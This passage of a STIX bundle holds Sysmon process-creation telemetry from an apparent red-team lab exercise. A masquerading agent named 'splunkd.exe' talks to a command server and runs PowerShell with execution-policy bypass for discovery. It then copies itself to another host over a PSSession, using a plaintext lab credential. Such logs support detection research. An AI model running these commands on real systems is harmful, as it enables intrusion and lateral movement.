| "entity_id": "{ca21cdf6-4b97-62e1-3102-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:28:39.830Z", | |
| "last_observed": "2022-07-27T14:28:39.830Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--6a5eaf17-88f4-4944-96c2-b0a83193928c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.781Z", | |
| "modified": "2022-07-28T16:05:45.781Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "dir" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4bc5-62e1-3d02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 3596, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C dir", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:29:33.798602161Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:29:27.472Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 3596, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C dir", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "dir" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4bc5-62e1-3d02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:29:25.862Z", | |
| "last_observed": "2022-07-27T14:29:25.862Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--b9f3b558-6410-487a-b491-759a582098b1", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.782Z", | |
| "modified": "2022-07-28T16:05:45.782Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "get-process" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4be8-62e1-3e02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 4684, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C get-process", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:30:09.063666515Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:30:02.742Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 4684, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C get-process", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "get-process" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4be8-62e1-3e02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:30:00.869Z", | |
| "last_observed": "2022-07-27T14:30:00.869Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--d203a697-f76b-4a50-9384-1554dfede74c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.782Z", | |
| "modified": "2022-07-28T16:05:45.782Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "ipconfig" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4c0b-62e1-3f02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 5364, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C ipconfig", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:30:43.448182483Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:30:37.111Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 5364, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C ipconfig", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "ipconfig" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4c0b-62e1-3f02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:30:35.893Z", | |
| "last_observed": "2022-07-27T14:30:35.893Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--c53a2a49-6622-4788-9950-735e1aadeb24", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.782Z", | |
| "modified": "2022-07-28T16:05:45.782Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "cmd.exe", | |
| "/C", | |
| "python3", | |
| "--version&python2", | |
| "--version&python", | |
| "--version" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.746 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows Command Processor", | |
| "pe_original_file_name": "Cmd.Exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4c48-62e1-4102-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "cmd.exe", | |
| "pid": 5788, | |
| "binary_ref": "6", | |
| "command_line": "cmd.exe /C python3 --version&python2 --version&python --version", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:31:45.035851822Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:31:38.697Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "cmd.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "cmd.exe", | |
| "/C", | |
| "python3", | |
| "--version&python2", | |
| "--version&python", | |
| "--version" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.746 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows Command Processor", | |
| "pe_original_file_name": "Cmd.Exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4c48-62e1-4102-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:31:36.909Z", | |
| "last_observed": "2022-07-27T14:31:36.909Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--ffff340e-35e2-4180-85f3-f65b1050eb36", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.783Z", | |
| "modified": "2022-07-28T16:05:45.783Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "$r1 = DNS-Lookup https://www.ibm.com/;$r2 = DNS-Lookup https://www.blackhat.com/us-22/;$r3 = DNS-Lookup https://github.com/;$r4 = DNS-Lookup https://european-union.europa.eu/;$r5 = DNS-Lookup https://www.japan.go.jp/;$r1.StatusCode, $r2.StatusCode, $r3.StatusCode, $r4.StatusCode, $r5.StatusCode -join ',';" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4ce3-62e1-5002-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 1204, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"$r1 = DNS-Lookup https://www.ibm.com/;$r2 = DNS-Lookup https://www.blackhat.com/us-22/;$r3 = DNS-Lookup https://github.com/;$r4 = DNS-Lookup https://european-union.europa.eu/;$r5 = DNS-Lookup https://www.japan.go.jp/;$r1.StatusCode, $r2.StatusCode, $r3.StatusCode, $r4.StatusCode, $r5.StatusCode -join ',';\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:34:19.750599475Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:34:13.426Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 1204, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"$r1 = DNS-Lookup https://www.ibm.com/;$r2 = DNS-Lookup https://www.blackhat.com/us-22/;$r3 = DNS-Lookup https://github.com/;$r4 = DNS-Lookup https://european-union.europa.eu/;$r5 = DNS-Lookup https://www.japan.go.jp/;$r1.StatusCode, $r2.StatusCode, $r3.StatusCode, $r4.StatusCode, $r5.StatusCode -join ',';\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "$r1 = DNS-Lookup https://www.ibm.com/;$r2 = DNS-Lookup https://www.blackhat.com/us-22/;$r3 = DNS-Lookup https://github.com/;$r4 = DNS-Lookup https://european-union.europa.eu/;$r5 = DNS-Lookup https://www.japan.go.jp/;$r1.StatusCode, $r2.StatusCode, $r3.StatusCode, $r4.StatusCode, $r5.StatusCode -join ',';" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4ce3-62e1-5002-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:34:11.997Z", | |
| "last_observed": "2022-07-27T14:34:11.997Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--8dc70f85-196f-4a76-b86e-c1059b7acc89", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.783Z", | |
| "modified": "2022-07-28T16:05:45.783Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "$job = Start-Job -ScriptBlock { $username = \"user\"; $password = \"redlab\"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr; $session = New-PSSession -ComputerName \"192.168.56.112\" -Credential $cred; $location = \"C:\\Users\\Public\\splunkd.exe\"; Copy-Item $location -Destination \"C:\\Users\\Public\\splunkd.exe\" -ToSession $session; Start-Sleep -s 5; Remove-PSSession -Session $session;};Receive-Job -Job $job -Wait;" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4d07-62e1-5102-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 6816, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"$job = Start-Job -ScriptBlock { $username = \\\"user\\\"; $password = \\\"redlab\\\"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr; $session = New-PSSession -ComputerName \\\"192.168.56.112\\\" -Credential $cred; $location = \\\"C:\\Users\\Public\\splunkd.exe\\\"; Copy-Item $location -Destination \\\"C:\\Users\\Public\\splunkd.exe\\\" -ToSession $session; Start-Sleep -s 5; Remove-PSSession -Session $session;};Receive-Job -Job $job -Wait;\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:34:55.037618443Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:34:48.714Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
